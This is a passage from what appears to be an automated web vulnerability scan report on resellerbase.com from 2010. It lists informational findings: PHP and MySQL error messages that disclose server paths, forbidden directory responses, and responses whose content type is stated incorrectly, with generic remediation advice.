Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:57:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Content-Length: 185
Connection: close
Content-Type: text/html

<br />
<b>Fatal error</b>: Call to a member function Fields() on a non-object in <b>/home/resellerbase/domains/resellerbase.com/public_html/lib/db.class.php</b> on line <b>0</b><br />

10.23. http://www.resellerbase.com/tag/outsource previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/outsource

Request

GET /tag/outsource HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/white-label-seo-resellers-search-engine-optimisation.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:58:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Content-Length: 185
Connection: close
Content-Type: text/html

<br />
<b>Fatal error</b>: Call to a member function Fields() on a non-object in <b>/home/resellerbase/domains/resellerbase.com/public_html/lib/db.class.php</b> on line <b>0</b><br />

10.24. http://www.resellerbase.com/tag/reseller previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/reseller

Request

GET /tag/reseller HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/45/dograecorp.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:57:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Content-Length: 185
Connection: close
Content-Type: text/html

<br />
<b>Fatal error</b>: Call to a member function Fields() on a non-object in <b>/home/resellerbase/domains/resellerbase.com/public_html/lib/db.class.php</b> on line <b>0</b><br />

10.25. http://www.resellerbase.com/tag/search+engine+optimisation previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/search+engine+optimisation

Request

GET /tag/search+engine+optimisation HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/white-label-seo-resellers-search-engine-optimisation.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:58:02 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Content-Length: 185
Connection: close
Content-Type: text/html

<br />
<b>Fatal error</b>: Call to a member function Fields() on a non-object in <b>/home/resellerbase/domains/resellerbase.com/public_html/lib/db.class.php</b> on line <b>0</b><br />

10.26. http://www.resellerbase.com/tag/search+engine+optimization previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/search+engine+optimization

Request

GET /tag/search+engine+optimization HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/white-label-seo-resellers-search-engine-optimisation.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:58:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Content-Length: 185
Connection: close
Content-Type: text/html

<br />
<b>Fatal error</b>: Call to a member function Fields() on a non-object in <b>/home/resellerbase/domains/resellerbase.com/public_html/lib/db.class.php</b> on line <b>0</b><br />

10.27. http://www.resellerbase.com/tag/search+engine+submission previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/search+engine+submission

Request

GET /tag/search+engine+submission HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/9/netapplications-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:58:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Content-Length: 185
Connection: close
Content-Type: text/html

<br />
<b>Fatal error</b>: Call to a member function Fields() on a non-object in <b>/home/resellerbase/domains/resellerbase.com/public_html/lib/db.class.php</b> on line <b>0</b><br />

10.28. http://www.resellerbase.com/tag/seo previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/seo

Request

GET /tag/seo HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/white-label-seo-resellers-search-engine-optimisation.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:58:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Content-Length: 185
Connection: close
Content-Type: text/html

<br />
<b>Fatal error</b>: Call to a member function Fields() on a non-object in <b>/home/resellerbase/domains/resellerbase.com/public_html/lib/db.class.php</b> on line <b>0</b><br />

10.29. http://www.resellerbase.com/tag/ssl+certificates previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/ssl+certificates

Request

GET /tag/ssl+certificates HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/45/dograecorp.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:57:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Content-Length: 185
Connection: close
Content-Type: text/html

<br />
<b>Fatal error</b>: Call to a member function Fields() on a non-object in <b>/home/resellerbase/domains/resellerbase.com/public_html/lib/db.class.php</b> on line <b>0</b><br />

10.30. http://www.resellerbase.com/tag/survey previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/survey

Request

GET /tag/survey HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/9/netapplications-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:58:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Content-Length: 185
Connection: close
Content-Type: text/html

<br />
<b>Fatal error</b>: Call to a member function Fields() on a non-object in <b>/home/resellerbase/domains/resellerbase.com/public_html/lib/db.class.php</b> on line <b>0</b><br />

10.31. http://www.resellerbase.com/tag/uptime+monitoring previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/uptime+monitoring

Request

GET /tag/uptime+monitoring HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/7/proxyonline-info-website-monitoring.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:58:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Content-Length: 185
Connection: close
Content-Type: text/html

<br />
<b>Fatal error</b>: Call to a member function Fields() on a non-object in <b>/home/resellerbase/domains/resellerbase.com/public_html/lib/db.class.php</b> on line <b>0</b><br />

10.32. http://www.resellerbase.com/tag/web+cam+chat previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/web+cam+chat

Request

GET /tag/web+cam+chat HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/42/rivcash-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:57:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Content-Length: 185
Connection: close
Content-Type: text/html

<br />
<b>Fatal error</b>: Call to a member function Fields() on a non-object in <b>/home/resellerbase/domains/resellerbase.com/public_html/lib/db.class.php</b> on line <b>0</b><br />

10.33. http://www.resellerbase.com/tag/web+statistics previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/web+statistics

Request

GET /tag/web+statistics HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/9/netapplications-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

10.34. http://www.resellerbase.com/tag/webhosting previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/webhosting

Request

GET /tag/webhosting HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/45/dograecorp.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

10.35. http://www.resellerbase.com/tag/website+monitoring previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/website+monitoring

Request

GET /tag/website+monitoring HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/7/proxyonline-info-website-monitoring.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

10.36. http://www.resellerbase.com/themes/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/themes/

Request

GET /themes/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.1 403 Forbidden
Date: Wed, 17 Nov 2010 22:54:49 GMT
Server: Apache/2
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 483

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>403 Forbidden</TITLE>
</HEAD><BODY>
<H1>Forbidden</H1>
You don't have permission to access /themes/ on this server.
<HR>
<I>www.r
...[SNIP]...

10.37. http://www.resellerbase.com/themes/kosmos/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/themes/kosmos/

Request

GET /themes/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.1 403 Forbidden
Date: Wed, 17 Nov 2010 22:54:49 GMT
Server: Apache/2
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 490

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>403 Forbidden</TITLE>
</HEAD><BODY>
<H1>Forbidden</H1>
You don't have permission to access /themes/kosmos/ on this server.
<HR>
<
...[SNIP]...

10.38. http://www.resellerbase.com/themes/kosmos/images/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/themes/kosmos/images/

Request

GET /themes/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.1 403 Forbidden
Date: Wed, 17 Nov 2010 22:54:49 GMT
Server: Apache/2
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 497

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>403 Forbidden</TITLE>
</HEAD><BODY>
<H1>Forbidden</H1>
You don't have permission to access /themes/kosmos/images/ on this server.
...[SNIP]...

10.39. http://www.resellerbase.com/themes/kosmos/images/pr/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/themes/kosmos/images/pr/

Request

GET /themes/kosmos/images/pr/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.1 403 Forbidden
Date: Wed, 17 Nov 2010 22:54:49 GMT
Server: Apache/2
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 500

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>403 Forbidden</TITLE>
</HEAD><BODY>
<H1>Forbidden</H1>
You don't have permission to access /themes/kosmos/images/pr/ on this serv
...[SNIP]...

10.40. http://www.resellerbase.com/themes/kosmos/images/rating/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/themes/kosmos/images/rating/

Request

GET /themes/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 403 Forbidden
Date: Wed, 17 Nov 2010 22:54:49 GMT
Server: Apache/2
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 504

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>403 Forbidden</TITLE>
</HEAD><BODY>
<H1>Forbidden</H1>
You don't have permission to access /themes/kosmos/images/rating/ on this
...[SNIP]...

10.41. http://www.resellerbase.com/themes/kosmos/images/review/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/themes/kosmos/images/review/

Request

GET /themes/kosmos/images/review/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 403 Forbidden
Date: Wed, 17 Nov 2010 22:54:49 GMT
Server: Apache/2
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 504

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>403 Forbidden</TITLE>
</HEAD><BODY>
<H1>Forbidden</H1>
You don't have permission to access /themes/kosmos/images/review/ on this
...[SNIP]...

10.42. http://www.resellerbase.com/themes/kosmos/images/template_24.gif/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/themes/kosmos/images/template_24.gif/

Request

GET /themes/kosmos/images/template_24.gif/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/blocks/block.whos_online.php
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 404 Not Found
Date: Wed, 17 Nov 2010 22:54:49 GMT
Server: Apache/2
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
Content-Length: 477
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<title>The top 100 Reseller resources</title>
<meta http-equiv="REFRESH" content="0;url=http://www.resellerbase.com"></HEAD
...[SNIP]...

10.43. http://www.resellerbase.com/user_detail.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/user_detail.php

Request

GET /user_detail.php?u=flerarcegrent HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 01:03:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Content-Length: 636
Connection: close
Content-Type: text/html

<br />
<b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: Too many connections in <b>/home/resellerbase/domains/resellerbase.com/public_html/lib/db.class.p
...[SNIP]...

10.44. http://www.resellerbase.com/web-service/more2.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/more2.html

Request

GET /web-service/more2.html HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:49:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Content-Length: 185
Connection: close
Content-Type: text/html

<br />
<b>Fatal error</b>: Call to a member function Fields() on a non-object in <b>/home/resellerbase/domains/resellerbase.com/public_html/lib/db.class.php</b> on line <b>0</b><br />

11. Content type incorrectly stated previous
There are 34 instances of this issue:

/adult/media-chat/more2.html
/adult/more2.html
/goods-wholesale/search.php
/googlepr.php
/other/search.php
/resources-information/ebooks/search.php
/resources-information/search.php
/tag/Outsource+SEO
/tag/Reseller+SEO
/tag/Resellers+SEO
/tag/SEO+Reseller
/tag/SEO+Resellers
/tag/SEO+outsourcing
/tag/SEO+reseller+program
/tag/White+Label+SEO
/tag/downtime+monitor
/tag/dripship
/tag/dropshipping
/tag/email+fax
/tag/nude
/tag/outsource
/tag/reseller
/tag/search+engine+optimisation
/tag/search+engine+optimization
/tag/search+engine+submission
/tag/seo
/tag/ssl+certificates
/tag/survey
/tag/uptime+monitoring
/tag/web+cam+chat
/tag/web+statistics
/tag/webhosting
/tag/website+monitoring
/web-service/more2.html

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

11.1. http://www.resellerbase.com/adult/media-chat/more2.html previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/adult/media-chat/more2.html

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

11.2. http://www.resellerbase.com/adult/more2.html previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/adult/more2.html

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

11.3. http://www.resellerbase.com/goods-wholesale/search.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/goods-wholesale/search.php

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

11.4. http://www.resellerbase.com/googlepr.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/googlepr.php

Issue detail

The response contains the following Content-type statement:

Content-Type: image/gif

The response states that it contains a GIF image. However, it actually appears to contain plain text.

Request

Response

11.5. http://www.resellerbase.com/other/search.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/other/search.php

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

11.6. http://www.resellerbase.com/resources-information/ebooks/search.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/resources-information/ebooks/search.php

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

11.7. http://www.resellerbase.com/resources-information/search.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/resources-information/search.php

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

11.8. http://www.resellerbase.com/tag/Outsource+SEO previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/tag/Outsource+SEO

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

11.9. http://www.resellerbase.com/tag/Reseller+SEO previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/tag/Reseller+SEO

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

11.10. http://www.resellerbase.com/tag/Resellers+SEO previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/tag/Resellers+SEO

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

11.11. http://www.resellerbase.com/tag/SEO+Reseller previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/tag/SEO+Reseller

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

11.12. http://www.resellerbase.com/tag/SEO+Resellers previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/tag/SEO+Resellers

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

11.13. http://www.resellerbase.com/tag/SEO+outsourcing previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/tag/SEO+outsourcing

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

11.14. http://www.resellerbase.com/tag/SEO+reseller+program previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/tag/SEO+reseller+program

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

11.15. http://www.resellerbase.com/tag/White+Label+SEO previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/tag/White+Label+SEO

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

11.16. http://www.resellerbase.com/tag/downtime+monitor previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/tag/downtime+monitor

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

11.17. http://www.resellerbase.com/tag/dripship previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/tag/dripship

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

11.18. http://www.resellerbase.com/tag/dropshipping previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/tag/dropshipping

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

11.19. http://www.resellerbase.com/tag/email+fax previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/tag/email+fax

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

11.20. http://www.resellerbase.com/tag/nude previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/tag/nude

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

11.21. http://www.resellerbase.com/tag/outsource previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/tag/outsource

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

11.22. http://www.resellerbase.com/tag/reseller previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/tag/reseller

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

11.23. http://www.resellerbase.com/tag/search+engine+optimisation previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/tag/search+engine+optimisation

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

11.24. http://www.resellerbase.com/tag/search+engine+optimization previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/tag/search+engine+optimization

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

11.25. http://www.resellerbase.com/tag/search+engine+submission previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/tag/search+engine+submission

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

11.26. http://www.resellerbase.com/tag/seo previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/tag/seo

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

11.27. http://www.resellerbase.com/tag/ssl+certificates previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.resellerbase.com
